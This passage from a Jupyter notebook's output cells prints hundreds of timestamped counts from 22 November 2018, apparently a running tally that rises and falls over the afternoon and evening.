"['2018-11-22 13:12:33.366382', 10]\n",
"['2018-11-22 13:14:13.343371', 11]\n",
"['2018-11-22 13:14:39.280169', 12]\n",
"['2018-11-22 13:16:34.563910', 11]\n",
"['2018-11-22 13:18:01.603788', 12]\n",
"['2018-11-22 13:18:40.612429', 13]\n",
"['2018-11-22 13:18:48.737596', 12]\n",
"['2018-11-22 13:19:05.631232', 13]\n",
"['2018-11-22 13:19:10.499628', 14]\n",
"['2018-11-22 13:19:20.659095', 13]\n",
"['2018-11-22 13:19:28.452657', 12]\n",
"['2018-11-22 13:20:58.039963', 13]\n",
"['2018-11-22 13:21:37.981849', 12]\n",
"['2018-11-22 13:22:11.881820', 13]\n",
"['2018-11-22 13:22:12.592279', 14]\n",
"['2018-11-22 13:22:39.500669', 15]\n",
"['2018-11-22 13:23:10.980031', 13]\n",
"['2018-11-22 13:23:11.198417', 14]\n",
"['2018-11-22 13:23:20.686626', 15]\n",
"['2018-11-22 13:23:24.046906', 16]\n",
"['2018-11-22 13:23:29.776052', 15]\n",
"['2018-11-22 13:23:31.866638', 16]\n",
"['2018-11-22 13:23:44.851889', 15]\n",
"['2018-11-22 13:24:12.253463', 14]\n",
"['2018-11-22 13:24:15.747296', 15]\n",
"['2018-11-22 13:25:14.249885', 14]\n",
"['2018-11-22 13:26:08.950607', 15]\n",
"['2018-11-22 13:26:32.282428', 16]\n",
"['2018-11-22 13:27:04.384417', 15]\n",
"['2018-11-22 13:27:30.539068', 14]\n",
"['2018-11-22 13:27:41.153730', 13]\n",
"['2018-11-22 13:29:36.173674', 14]\n",
"['2018-11-22 13:30:06.047292', 13]\n",
"['2018-11-22 13:30:16.319573', 14]\n",
"['2018-11-22 13:30:39.130208', 13]\n",
"['2018-11-22 13:30:52.073310', 14]\n",
"['2018-11-22 13:30:58.457943', 13]\n",
"['2018-11-22 13:30:59.872162', 14]\n",
"['2018-11-22 13:31:30.580673', 13]\n",
"['2018-11-22 13:31:44.855444', 12]\n",
"['2018-11-22 13:31:46.907059', 11]\n",
"['2018-11-22 13:32:14.255063', 12]\n",
"['2018-11-22 13:32:15.353790', 13]\n",
"['2018-11-22 13:32:33.847139', 14]\n",
"['2018-11-22 13:32:43.313070', 15]\n",
"['2018-11-22 13:32:56.891590', 16]\n",
"['2018-11-22 13:32:58.176967', 17]\n",
"['2018-11-22 13:33:09.564321', 16]\n",
"['2018-11-22 13:33:24.489085', 17]\n",
"['2018-11-22 13:33:39.232892', 16]\n",
"['2018-11-22 13:34:32.636745', 15]\n",
"['2018-11-22 13:35:04.929228', 14]\n",
"['2018-11-22 13:36:02.194032', 13]\n",
"['2018-11-22 13:36:50.698680', 12]\n",
"['2018-11-22 13:37:10.096914', 13]\n",
"['2018-11-22 13:37:17.208762', 14]\n",
"['2018-11-22 13:37:48.834753', 11]\n",
"['2018-11-22 13:37:52.089194', 12]\n",
"['2018-11-22 13:38:00.745312', 13]\n",
"['2018-11-22 13:38:40.208733', 11]\n",
"['2018-11-22 13:38:52.742944', 12]\n",
"['2018-11-22 13:39:07.416911', 11]\n",
"['2018-11-22 13:41:05.458910', 12]\n",
"['2018-11-22 13:41:51.760298', 13]\n",
"['2018-11-22 13:42:02.522220', 12]\n",
"['2018-11-22 13:42:06.994406', 11]\n",
"['2018-11-22 13:43:59.308951', 10]\n",
"['2018-11-22 13:44:57.614882', 11]\n",
"['2018-11-22 13:45:33.549244', 10]\n",
"['2018-11-22 13:46:02.528295', 9]\n",
"['2018-11-22 13:47:24.891172', 8]\n",
"['2018-11-22 13:49:10.895439', 7]\n",
"['2018-11-22 13:52:04.646165', 5]\n",
"['2018-11-22 13:54:49.502981', 4]\n",
"['2018-11-22 14:00:18.755163', 3]\n",
"['2018-11-22 14:04:38.242652', 2]\n",
"['2018-11-22 14:05:22.667893', 3]\n",
"['2018-11-22 14:05:41.986141', 4]\n",
"['2018-11-22 14:06:16.676750', 5]\n",
"['2018-11-22 14:06:18.779131', 6]\n",
"['2018-11-22 14:06:38.714728', 7]\n",
"['2018-11-22 14:06:41.447868', 8]\n",
"['2018-11-22 14:07:34.653731', 9]\n",
"['2018-11-22 14:10:07.237398', 8]\n",
"['2018-11-22 14:10:55.308129', 6]\n",
"['2018-11-22 14:10:58.533691', 7]\n",
"['2018-11-22 14:11:04.085020', 8]\n",
"['2018-11-22 14:11:08.806838', 9]\n",
"['2018-11-22 14:11:10.860992', 10]\n",
"['2018-11-22 14:11:11.200503', 11]\n",
"['2018-11-22 14:11:15.280206', 12]\n",
"['2018-11-22 14:11:16.758585', 13]\n",
"['2018-11-22 14:11:19.778569', 14]\n",
"['2018-11-22 14:11:25.756946', 15]\n",
"['2018-11-22 14:11:36.141892', 16]\n",
"['2018-11-22 14:11:37.887852', 17]\n",
"['2018-11-22 14:11:38.343037', 18]\n",
"['2018-11-22 14:11:39.735905', 19]\n",
"['2018-11-22 14:11:47.828209', 20]\n",
"['2018-11-22 14:11:55.018222', 21]\n",
"['2018-11-22 14:12:00.869630', 22]\n",
"['2018-11-22 14:12:05.543976', 23]\n",
"['2018-11-22 14:12:05.991282', 24]\n",
"['2018-11-22 14:12:10.708061', 25]\n",
"['2018-11-22 14:12:17.234780', 26]\n",
"['2018-11-22 14:12:41.321535', 27]\n",
"['2018-11-22 14:13:11.791647', 28]\n",
"['2018-11-22 14:13:31.622031', 29]\n",
"['2018-11-22 14:13:37.318582', 30]\n",
"['2018-11-22 14:14:07.786816', 31]\n",
"['2018-11-22 14:14:27.690556', 30]\n",
"['2018-11-22 14:14:50.586703', 31]\n",
"['2018-11-22 14:14:52.046744', 32]\n",
"['2018-11-22 14:14:53.123306', 33]\n",
"['2018-11-22 14:15:05.326318', 32]\n",
"['2018-11-22 14:15:19.467000', 31]\n",
"['2018-11-22 14:15:24.798779', 30]\n",
"['2018-11-22 14:15:26.642655', 31]\n",
"['2018-11-22 14:15:33.199416', 32]\n",
"['2018-11-22 14:15:33.221361', 33]\n",
"['2018-11-22 14:15:36.872112', 31]\n",
"['2018-11-22 14:15:40.425803', 32]\n",
"['2018-11-22 14:16:01.606288', 31]\n",
"['2018-11-22 14:16:36.225867', 32]\n",
"['2018-11-22 14:17:14.621017', 31]\n",
"['2018-11-22 14:17:14.789164', 32]\n",
"['2018-11-22 14:18:23.245358', 28]\n",
"['2018-11-22 14:18:32.424757', 27]\n",
"['2018-11-22 14:19:07.690574', 26]\n",
"['2018-11-22 14:19:19.401400', 27]\n",
"['2018-11-22 14:19:20.926113', 26]\n",
"['2018-11-22 14:19:34.987851', 25]\n",
"['2018-11-22 14:19:39.249025', 24]\n",
"['2018-11-22 14:19:50.979401', 23]\n",
"['2018-11-22 14:19:53.092936', 24]\n",
"['2018-11-22 14:19:56.816915', 23]\n",
"['2018-11-22 14:20:02.664103', 21]\n",
"['2018-11-22 14:20:05.636381', 22]\n",
"['2018-11-22 14:20:05.776684', 23]\n",
"['2018-11-22 14:20:09.696663', 22]\n",
"['2018-11-22 14:20:18.907801', 21]\n",
"['2018-11-22 14:20:21.966179', 20]\n",
"['2018-11-22 14:20:23.000734', 21]\n",
"['2018-11-22 14:20:27.232361', 22]\n",
"['2018-11-22 14:20:28.066518', 20]\n",
"['2018-11-22 14:20:37.426212', 19]\n",
"['2018-11-22 14:20:49.163736', 18]\n",
"['2018-11-22 14:21:06.040834', 19]\n",
"['2018-11-22 14:21:18.434248', 18]\n",
"['2018-11-22 14:21:24.243249', 17]\n",
"['2018-11-22 14:21:28.770151', 18]\n",
"['2018-11-22 14:22:01.127764', 19]\n",
"['2018-11-22 14:22:43.737324', 18]\n",
"['2018-11-22 14:22:49.567328', 17]\n",
"['2018-11-22 14:23:05.677685', 16]\n",
"['2018-11-22 14:23:09.262483', 17]\n",
"['2018-11-22 14:23:24.033322', 16]\n",
"['2018-11-22 14:23:41.843843', 17]\n",
"['2018-11-22 14:23:57.377072', 16]\n",
"['2018-11-22 14:24:13.398790', 15]\n",
"['2018-11-22 14:24:33.117816', 16]\n",
"['2018-11-22 14:24:47.845947', 17]\n",
"['2018-11-22 14:25:06.669196', 16]\n",
"['2018-11-22 14:25:31.612366', 13]\n",
"['2018-11-22 14:25:38.646508', 14]\n",
"['2018-11-22 14:26:21.632864', 13]\n",
"['2018-11-22 14:27:10.311664', 12]\n",
"['2018-11-22 14:28:27.654765', 13]\n",
"['2018-11-22 14:28:51.070040', 12]\n",
"['2018-11-22 14:29:40.944912', 13]\n",
"['2018-11-22 14:29:46.612275', 14]\n",
"['2018-11-22 14:29:58.647577', 15]\n",
"['2018-11-22 14:30:06.958070', 16]\n",
"['2018-11-22 14:31:21.375254', 15]\n",
"['2018-11-22 14:32:14.349855', 16]\n",
"['2018-11-22 14:32:40.912187', 15]\n",
"['2018-11-22 14:34:03.635026', 14]\n",
"['2018-11-22 14:34:14.851122', 13]\n",
"['2018-11-22 14:34:25.938826', 14]\n",
"['2018-11-22 14:34:27.772540', 13]\n",
"['2018-11-22 14:35:05.931244', 12]\n",
"['2018-11-22 14:35:25.335880', 13]\n",
"['2018-11-22 14:35:40.502939', 14]\n",
"['2018-11-22 14:35:43.682890', 15]\n",
"['2018-11-22 14:36:12.906911', 16]\n",
"['2018-11-22 14:37:31.564426', 15]\n",
"['2018-11-22 14:37:45.636770', 14]\n",
"['2018-11-22 14:38:06.214079', 15]\n",
"['2018-11-22 14:38:13.751233', 16]\n",
"['2018-11-22 14:38:34.784597', 14]\n",
"['2018-11-22 14:38:41.210413', 15]\n",
"['2018-11-22 14:39:18.403401', 16]\n",
"['2018-11-22 14:41:10.616049', 17]\n",
"['2018-11-22 14:41:29.209931', 16]\n",
"['2018-11-22 14:42:04.711010', 17]\n",
"['2018-11-22 14:43:08.519702', 16]\n",
"['2018-11-22 14:44:11.192206', 17]\n",
"['2018-11-22 14:44:25.733902', 16]\n",
"['2018-11-22 14:44:58.329149', 17]\n",
"['2018-11-22 14:45:01.069409', 16]\n",
"['2018-11-22 14:45:17.757557', 13]\n",
"['2018-11-22 14:45:25.243029', 12]\n",
"['2018-11-22 14:45:42.831721', 11]\n",
"['2018-11-22 14:46:21.767782', 10]\n",
"['2018-11-22 14:47:11.550605', 9]\n",
"['2018-11-22 14:47:40.578517', 10]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 14:48:40.818351', 7]\n",
"['2018-11-22 14:51:40.665381', 5]\n",
"['2018-11-22 14:53:47.044001', 4]\n",
"['2018-11-22 14:54:19.351517', 5]\n",
"['2018-11-22 14:55:46.650931', 6]\n",
"['2018-11-22 14:57:59.709557', 5]\n",
"['2018-11-22 14:58:17.553574', 6]\n",
"['2018-11-22 14:59:30.675920', 7]\n",
"['2018-11-22 15:00:59.635835', 8]\n",
"['2018-11-22 15:01:48.568852', 9]\n",
"['2018-11-22 15:01:51.944651', 10]\n",
"['2018-11-22 15:01:59.992550', 11]\n",
"['2018-11-22 15:02:12.031364', 12]\n",
"['2018-11-22 15:02:40.176867', 11]\n",
"['2018-11-22 15:03:03.044385', 12]\n",
"['2018-11-22 15:03:13.950610', 13]\n",
"['2018-11-22 15:03:24.858574', 12]\n",
"['2018-11-22 15:03:28.341038', 11]\n",
"['2018-11-22 15:03:32.651150', 12]\n",
"['2018-11-22 15:03:42.472157', 11]\n",
"['2018-11-22 15:04:19.796257', 12]\n",
"['2018-11-22 15:05:39.239826', 11]\n",
"['2018-11-22 15:06:47.490452', 10]\n",
"['2018-11-22 15:07:08.096842', 7]\n",
"['2018-11-22 15:08:13.813695', 6]\n",
"['2018-11-22 15:09:16.448024', 5]\n",
"['2018-11-22 15:09:50.615082', 6]\n",
"['2018-11-22 15:10:00.856763', 7]\n",
"['2018-11-22 15:10:22.648588', 6]\n",
"['2018-11-22 15:11:05.901526', 7]\n",
"['2018-11-22 15:11:26.799393', 8]\n",
"['2018-11-22 15:12:13.192811', 9]\n",
"['2018-11-22 15:14:35.988209', 10]\n",
"['2018-11-22 15:14:37.705342', 11]\n",
"['2018-11-22 15:15:10.863782', 12]\n",
"['2018-11-22 15:15:31.617338', 11]\n",
"['2018-11-22 15:16:13.777530', 10]\n",
"['2018-11-22 15:16:29.161111', 11]\n",
"['2018-11-22 15:16:48.906327', 10]\n",
"['2018-11-22 15:17:11.314229', 11]\n",
"['2018-11-22 15:17:39.338407', 12]\n",
"['2018-11-22 15:18:52.421771', 13]\n",
"['2018-11-22 15:18:57.097519', 14]\n",
"['2018-11-22 15:19:27.032263', 13]\n",
"['2018-11-22 15:20:39.938585', 11]\n",
"['2018-11-22 15:21:27.053063', 10]\n",
"['2018-11-22 15:22:09.782145', 11]\n",
"['2018-11-22 15:22:17.153328', 10]\n",
"['2018-11-22 15:22:49.788522', 11]\n",
"['2018-11-22 15:23:34.166825', 12]\n",
"['2018-11-22 15:24:02.595701', 11]\n",
"['2018-11-22 15:24:14.916942', 12]\n",
"['2018-11-22 15:24:27.833087', 11]\n",
"['2018-11-22 15:24:30.194571', 10]\n",
"['2018-11-22 15:25:36.231132', 11]\n",
"['2018-11-22 15:25:51.691400', 10]\n",
"['2018-11-22 15:26:14.761098', 11]\n",
"['2018-11-22 15:26:45.325196', 12]\n",
"['2018-11-22 15:27:07.852867', 13]\n",
"['2018-11-22 15:27:28.867607', 14]\n",
"['2018-11-22 15:27:45.736587', 15]\n",
"['2018-11-22 15:28:31.759763', 14]\n",
"['2018-11-22 15:28:45.425502', 13]\n",
"['2018-11-22 15:28:47.914968', 14]\n",
"['2018-11-22 15:28:51.894057', 15]\n",
"['2018-11-22 15:29:44.671225', 16]\n",
"['2018-11-22 15:30:09.675458', 15]\n",
"['2018-11-22 15:30:15.204101', 14]\n",
"['2018-11-22 15:30:22.236236', 15]\n",
"['2018-11-22 15:30:43.710377', 16]\n",
"['2018-11-22 15:31:09.832921', 15]\n",
"['2018-11-22 15:31:18.373459', 16]\n",
"['2018-11-22 15:31:26.646010', 17]\n",
"['2018-11-22 15:31:36.839093', 16]\n",
"['2018-11-22 15:32:00.773425', 17]\n",
"['2018-11-22 15:32:01.630397', 18]\n",
"['2018-11-22 15:32:04.146219', 19]\n",
"['2018-11-22 15:32:39.748042', 20]\n",
"['2018-11-22 15:32:44.529412', 21]\n",
"['2018-11-22 15:32:48.537028', 20]\n",
"['2018-11-22 15:34:01.973385', 19]\n",
"['2018-11-22 15:34:10.015033', 18]\n",
"['2018-11-22 15:34:32.797669', 19]\n",
"['2018-11-22 15:34:33.853630', 18]\n",
"['2018-11-22 15:34:38.411317', 19]\n",
"['2018-11-22 15:34:43.865881', 18]\n",
"['2018-11-22 15:34:53.884399', 17]\n",
"['2018-11-22 15:35:18.419527', 16]\n",
"['2018-11-22 15:35:29.226717', 15]\n",
"['2018-11-22 15:36:03.736439', 16]\n",
"['2018-11-22 15:36:05.816015', 17]\n",
"['2018-11-22 15:36:09.256806', 16]\n",
"['2018-11-22 15:36:20.847437', 15]\n",
"['2018-11-22 15:36:40.923514', 14]\n",
"['2018-11-22 15:36:49.286881', 13]\n",
"['2018-11-22 15:37:48.539668', 14]\n",
"['2018-11-22 15:37:50.782708', 15]\n",
"['2018-11-22 15:38:02.259781', 14]\n",
"['2018-11-22 15:38:35.879693', 13]\n",
"['2018-11-22 15:38:39.397219', 12]\n",
"['2018-11-22 15:39:05.950918', 11]\n",
"['2018-11-22 15:40:04.773753', 10]\n",
"['2018-11-22 15:40:12.604237', 11]\n",
"['2018-11-22 15:40:18.350857', 10]\n",
"['2018-11-22 15:41:52.386194', 9]\n",
"['2018-11-22 15:42:05.594342', 8]\n",
"['2018-11-22 15:42:25.853629', 7]\n",
"['2018-11-22 15:43:51.001815', 8]\n",
"['2018-11-22 15:46:09.828059', 7]\n",
"['2018-11-22 15:47:59.928284', 6]\n",
"['2018-11-22 15:56:01.987762', 2]\n",
"['2018-11-22 16:00:49.279855', 3]\n",
"['2018-11-22 16:01:17.578007', 4]\n",
"['2018-11-22 16:01:41.276749', 5]\n",
"['2018-11-22 16:02:24.627886', 4]\n",
"['2018-11-22 16:03:47.146946', 5]\n",
"['2018-11-22 16:05:02.621390', 6]\n",
"['2018-11-22 16:05:25.953219', 5]\n",
"['2018-11-22 16:08:43.829884', 6]\n",
"['2018-11-22 16:10:40.910455', 7]\n",
"['2018-11-22 16:11:24.634191', 8]\n",
"['2018-11-22 16:13:18.427746', 9]\n",
"['2018-11-22 16:14:37.872071', 10]\n",
"['2018-11-22 16:14:43.245487', 11]\n",
"['2018-11-22 16:15:00.782610', 12]\n",
"['2018-11-22 16:15:01.492962', 13]\n",
"['2018-11-22 16:15:05.626011', 14]\n",
"['2018-11-22 16:15:22.842088', 15]\n",
"['2018-11-22 16:15:35.491317', 14]\n",
"['2018-11-22 16:15:47.879352', 15]\n",
"['2018-11-22 16:16:02.408194', 16]\n",
"['2018-11-22 16:16:11.349314', 17]\n",
"['2018-11-22 16:16:21.566826', 18]\n",
"['2018-11-22 16:17:38.268971', 17]\n",
"['2018-11-22 16:17:50.796890', 18]\n",
"['2018-11-22 16:18:25.028551', 17]\n",
"['2018-11-22 16:18:42.577346', 15]\n",
"['2018-11-22 16:18:43.387686', 14]\n",
"['2018-11-22 16:18:47.925686', 15]\n",
"['2018-11-22 16:18:51.649773', 16]\n",
"['2018-11-22 16:19:19.961596', 17]\n",
"['2018-11-22 16:19:47.926235', 16]\n",
"['2018-11-22 16:19:55.673176', 17]\n",
"['2018-11-22 16:20:11.339499', 16]\n",
"['2018-11-22 16:20:17.774794', 17]\n",
"['2018-11-22 16:20:21.650028', 15]\n",
"['2018-11-22 16:20:29.816298', 13]\n",
"['2018-11-22 16:20:44.292802', 14]\n",
"['2018-11-22 16:20:52.834523', 15]\n",
"['2018-11-22 16:21:20.408352', 16]\n",
"['2018-11-22 16:21:56.929062', 15]\n",
"['2018-11-22 16:22:21.806059', 16]\n",
"['2018-11-22 16:22:48.285196', 17]\n",
"['2018-11-22 16:22:57.650524', 16]\n",
"['2018-11-22 16:23:14.623715', 17]\n",
"['2018-11-22 16:23:21.716762', 18]\n",
"['2018-11-22 16:23:52.861204', 17]\n",
"['2018-11-22 16:23:57.643317', 16]\n",
"['2018-11-22 16:23:58.719543', 15]\n",
"['2018-11-22 16:24:12.189930', 16]\n",
"['2018-11-22 16:24:17.538080', 15]\n",
"['2018-11-22 16:24:21.223063', 16]\n",
"['2018-11-22 16:24:26.222385', 15]\n",
"['2018-11-22 16:25:07.090025', 13]\n",
"['2018-11-22 16:26:28.735893', 12]\n",
"['2018-11-22 16:26:45.971177', 13]\n",
"['2018-11-22 16:27:00.357140', 12]\n",
"['2018-11-22 16:27:10.198234', 13]\n",
"['2018-11-22 16:27:13.066774', 12]\n",
"['2018-11-22 16:27:18.749792', 11]\n",
"['2018-11-22 16:27:28.118726', 10]\n",
"['2018-11-22 16:28:01.094130', 11]\n",
"['2018-11-22 16:28:13.319303', 10]\n",
"['2018-11-22 16:28:16.774386', 11]\n",
"['2018-11-22 16:28:27.946736', 12]\n",
"['2018-11-22 16:28:44.303317', 11]\n",
"['2018-11-22 16:30:30.208097', 10]\n",
"['2018-11-22 16:32:01.990894', 11]\n",
"['2018-11-22 16:32:13.014100', 10]\n",
"['2018-11-22 16:33:48.782181', 7]\n",
"['2018-11-22 16:34:35.744717', 8]\n",
"['2018-11-22 16:34:56.390735', 7]\n",
"['2018-11-22 16:35:07.549111', 8]\n",
"['2018-11-22 16:35:52.801271', 9]\n",
"['2018-11-22 16:36:15.813061', 10]\n",
"['2018-11-22 16:36:26.461970', 9]\n",
"['2018-11-22 16:38:07.997082', 8]\n",
"['2018-11-22 16:39:25.416279', 7]\n",
"['2018-11-22 16:39:35.367143', 8]\n",
"['2018-11-22 16:39:55.436828', 7]\n",
"['2018-11-22 16:40:25.486794', 6]\n",
"['2018-11-22 16:42:22.283703', 5]\n",
"['2018-11-22 16:42:42.303902', 4]\n",
"['2018-11-22 16:43:00.832406', 5]\n",
"['2018-11-22 16:52:01.579979', 4]\n",
"['2018-11-22 16:52:45.385464', 5]\n",
"['2018-11-22 16:53:36.849832', 6]\n",
"['2018-11-22 16:53:38.220243', 7]\n",
"['2018-11-22 16:53:41.830875', 8]\n",
"['2018-11-22 16:53:53.839770', 9]\n",
"['2018-11-22 16:53:55.589724', 10]\n",
"['2018-11-22 16:53:57.329638', 11]\n",
"['2018-11-22 16:54:31.236655', 12]\n",
"['2018-11-22 16:54:52.367858', 13]\n",
"['2018-11-22 16:55:40.947873', 12]\n",
"['2018-11-22 16:57:38.795658', 11]\n",
"['2018-11-22 16:58:27.081765', 12]\n",
"['2018-11-22 16:58:30.827082', 13]\n",
"['2018-11-22 16:58:47.802312', 12]\n",
"['2018-11-22 16:58:58.264418', 13]\n",
"['2018-11-22 16:59:00.482686', 14]\n",
"['2018-11-22 16:59:02.676643', 15]\n",
"['2018-11-22 16:59:07.842628', 16]\n",
"['2018-11-22 16:59:09.264601', 17]\n",
"['2018-11-22 16:59:29.947856', 16]\n",
"['2018-11-22 16:59:43.649448', 15]\n",
"['2018-11-22 17:01:34.250032', 14]\n",
"['2018-11-22 17:01:57.293299', 13]\n",
"['2018-11-22 17:02:29.771232', 12]\n",
"['2018-11-22 17:02:35.442188', 11]\n",
"['2018-11-22 17:03:17.145515', 12]\n",
"['2018-11-22 17:03:54.868539', 11]\n",
"['2018-11-22 17:05:48.459357', 12]\n",
"['2018-11-22 17:06:01.433464', 13]\n",
"['2018-11-22 17:06:32.686665', 12]\n",
"['2018-11-22 17:07:02.109027', 11]\n",
"['2018-11-22 17:07:23.598153', 10]\n",
"['2018-11-22 17:08:07.802279', 9]\n",
"['2018-11-22 17:08:46.558682', 10]\n",
"['2018-11-22 17:09:31.880191', 11]\n",
"['2018-11-22 17:12:39.097854', 12]\n",
"['2018-11-22 17:12:53.102670', 13]\n",
"['2018-11-22 17:13:07.572529', 14]\n",
"['2018-11-22 17:13:13.579384', 15]\n",
"['2018-11-22 17:13:40.980630', 16]\n",
"['2018-11-22 17:13:58.916825', 15]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 17:14:36.281878', 16]\n",
"['2018-11-22 17:14:48.746874', 15]\n",
"['2018-11-22 17:15:16.648080', 16]\n",
"['2018-11-22 17:15:34.806006', 17]\n",
"['2018-11-22 17:16:00.904503', 16]\n",
"['2018-11-22 17:16:34.822053', 15]\n",
"['2018-11-22 17:16:43.977334', 13]\n",
"['2018-11-22 17:17:14.375745', 12]\n",
"['2018-11-22 17:17:30.494042', 13]\n",
"['2018-11-22 17:18:59.321472', 12]\n",
"['2018-11-22 17:19:11.135448', 13]\n",
"['2018-11-22 17:19:16.712407', 12]\n",
"['2018-11-22 17:19:40.810594', 11]\n",
"['2018-11-22 17:19:40.886602', 12]\n",
"['2018-11-22 17:20:33.351832', 13]\n",
"['2018-11-22 17:20:53.902338', 14]\n",
"['2018-11-22 17:22:36.784659', 13]\n",
"['2018-11-22 17:22:52.118842', 14]\n",
"['2018-11-22 17:24:08.925297', 13]\n",
"['2018-11-22 17:24:19.253350', 14]\n",
"['2018-11-22 17:24:50.449659', 15]\n",
"['2018-11-22 17:24:56.602865', 16]\n",
"['2018-11-22 17:25:01.676934', 17]\n",
"['2018-11-22 17:25:16.412104', 18]\n",
"['2018-11-22 17:25:21.426983', 17]\n",
"['2018-11-22 17:25:26.295848', 18]\n",
"['2018-11-22 17:25:51.943969', 19]\n",
"['2018-11-22 17:25:56.256138', 20]\n",
"['2018-11-22 17:26:10.347573', 21]\n",
"['2018-11-22 17:26:29.944985', 22]\n",
"['2018-11-22 17:26:40.415122', 23]\n",
"['2018-11-22 17:26:43.958430', 24]\n",
"['2018-11-22 17:26:45.042760', 25]\n",
"['2018-11-22 17:26:46.263781', 26]\n",
"['2018-11-22 17:26:55.214743', 25]\n",
"['2018-11-22 17:27:15.666060', 24]\n",
"['2018-11-22 17:27:31.335997', 23]\n",
"['2018-11-22 17:27:56.955001', 24]\n",
"['2018-11-22 17:28:10.225176', 23]\n",
"['2018-11-22 17:28:17.224244', 24]\n",
"['2018-11-22 17:28:31.961184', 25]\n",
"['2018-11-22 17:28:44.556834', 24]\n",
"['2018-11-22 17:29:27.271797', 23]\n",
"['2018-11-22 17:29:33.843295', 24]\n",
"['2018-11-22 17:30:01.608093', 21]\n",
"['2018-11-22 17:30:02.584182', 20]\n",
"['2018-11-22 17:30:07.501963', 19]\n",
"['2018-11-22 17:30:16.964299', 18]\n",
"['2018-11-22 17:30:32.039400', 19]\n",
"['2018-11-22 17:30:33.792260', 20]\n",
"['2018-11-22 17:30:46.082677', 18]\n",
"['2018-11-22 17:31:00.637598', 17]\n",
"['2018-11-22 17:31:28.412951', 18]\n",
"['2018-11-22 17:31:53.343289', 19]\n",
"['2018-11-22 17:31:57.490378', 18]\n",
"['2018-11-22 17:32:00.288960', 19]\n",
"['2018-11-22 17:32:06.429722', 20]\n",
"['2018-11-22 17:32:17.285875', 21]\n",
"['2018-11-22 17:32:28.722205', 22]\n",
"['2018-11-22 17:32:36.088429', 23]\n",
"['2018-11-22 17:32:39.959122', 24]\n",
"['2018-11-22 17:32:43.091472', 25]\n",
"['2018-11-22 17:32:45.374030', 24]\n",
"['2018-11-22 17:32:46.569358', 23]\n",
"['2018-11-22 17:32:49.850999', 24]\n",
"['2018-11-22 17:32:50.219683', 25]\n",
"['2018-11-22 17:33:00.984341', 24]\n",
"['2018-11-22 17:33:04.401349', 25]\n",
"['2018-11-22 17:33:07.288248', 26]\n",
"['2018-11-22 17:33:20.290446', 25]\n",
"['2018-11-22 17:33:31.979522', 26]\n",
"['2018-11-22 17:33:35.597151', 24]\n",
"['2018-11-22 17:33:37.877768', 25]\n",
"['2018-11-22 17:33:45.112686', 26]\n",
"['2018-11-22 17:33:51.096816', 27]\n",
"['2018-11-22 17:34:06.877153', 26]\n",
"['2018-11-22 17:34:10.358510', 25]\n",
"['2018-11-22 17:34:15.140956', 26]\n",
"['2018-11-22 17:34:31.554852', 27]\n",
"['2018-11-22 17:34:40.828138', 26]\n",
"['2018-11-22 17:35:37.807464', 25]\n",
"['2018-11-22 17:36:08.441309', 24]\n",
"['2018-11-22 17:36:14.169655', 25]\n",
"['2018-11-22 17:36:27.213800', 23]\n",
"['2018-11-22 17:36:52.427404', 22]\n",
"['2018-11-22 17:37:00.668654', 23]\n",
"['2018-11-22 17:37:32.444954', 21]\n",
"['2018-11-22 17:37:42.988092', 20]\n",
"['2018-11-22 17:37:49.533385', 16]\n",
"['2018-11-22 17:37:52.467654', 15]\n",
"['2018-11-22 17:38:31.789913', 13]\n",
"['2018-11-22 17:38:49.617595', 9]\n",
"['2018-11-22 17:39:13.691087', 10]\n",
"['2018-11-22 17:40:14.898980', 9]\n",
"['2018-11-22 17:40:45.688113', 10]\n",
"['2018-11-22 17:41:03.311209', 9]\n",
"['2018-11-22 17:41:04.979222', 10]\n",
"['2018-11-22 17:41:38.142426', 11]\n",
"['2018-11-22 17:43:07.036897', 9]\n",
"['2018-11-22 17:43:19.699195', 8]\n",
"['2018-11-22 17:45:01.487710', 7]\n",
"['2018-11-22 17:45:04.739544', 6]\n",
"['2018-11-22 17:45:21.489479', 5]\n",
"['2018-11-22 17:45:55.153057', 4]\n",
"['2018-11-22 17:45:56.698643', 5]\n",
"['2018-11-22 17:48:01.627726', 6]\n",
"['2018-11-22 17:50:13.802832', 5]\n",
"['2018-11-22 17:51:39.842599', 6]\n",
"['2018-11-22 17:54:27.491735', 5]\n",
"['2018-11-22 17:55:37.010524', 3]\n",
"['2018-11-22 17:56:46.755669', 2]\n",
"['2018-11-22 17:58:36.139031', 3]\n",
"['2018-11-22 18:00:44.730560', 4]\n",
"['2018-11-22 18:00:52.738944', 3]\n",
"['2018-11-22 18:07:23.884958', 4]\n",
"['2018-11-22 18:09:04.165565', 5]\n",
"['2018-11-22 18:10:06.890786', 6]\n",
"['2018-11-22 18:10:41.135928', 7]\n",
"['2018-11-22 18:10:42.283518', 8]\n",
"['2018-11-22 18:10:54.818178', 9]\n",
"['2018-11-22 18:11:00.514396', 10]\n",
"['2018-11-22 18:11:04.649308', 11]\n",
"['2018-11-22 18:11:10.312624', 12]\n",
"['2018-11-22 18:11:37.859139', 13]\n",
"['2018-11-22 18:11:38.540360', 14]\n",
"['2018-11-22 18:11:43.234251', 15]\n",
"['2018-11-22 18:11:47.981755', 16]\n",
"['2018-11-22 18:11:48.858050', 17]\n",
"['2018-11-22 18:11:53.970611', 18]\n",
"['2018-11-22 18:12:12.972788', 19]\n",
"['2018-11-22 18:12:14.362455', 20]\n",
"['2018-11-22 18:12:29.386962', 21]\n",
"['2018-11-22 18:12:44.279755', 22]\n",
"['2018-11-22 18:13:04.921214', 21]\n",
"['2018-11-22 18:13:21.303991', 22]\n",
"['2018-11-22 18:13:24.665083', 21]\n",
"['2018-11-22 18:13:53.110425', 22]\n",
"['2018-11-22 18:14:01.694641', 23]\n",
"['2018-11-22 18:14:10.743598', 22]\n",
"['2018-11-22 18:15:48.130371', 23]\n",
"['2018-11-22 18:16:00.854871', 24]\n",
"['2018-11-22 18:16:10.123032', 23]\n",
"['2018-11-22 18:16:15.261291', 22]\n",
"['2018-11-22 18:17:47.060346', 21]\n",
"['2018-11-22 18:17:53.189155', 19]\n",
"['2018-11-22 18:17:55.147758', 18]\n",
"['2018-11-22 18:18:05.156417', 17]\n",
"['2018-11-22 18:18:15.162383', 16]\n",
"['2018-11-22 18:18:19.384061', 17]\n",
"['2018-11-22 18:18:47.952563', 15]\n",
"['2018-11-22 18:19:20.299685', 16]\n",
"['2018-11-22 18:19:28.605305', 17]\n",
"['2018-11-22 18:19:51.292391', 13]\n",
"['2018-11-22 18:19:54.460941', 14]\n",
"['2018-11-22 18:20:03.946172', 13]\n",
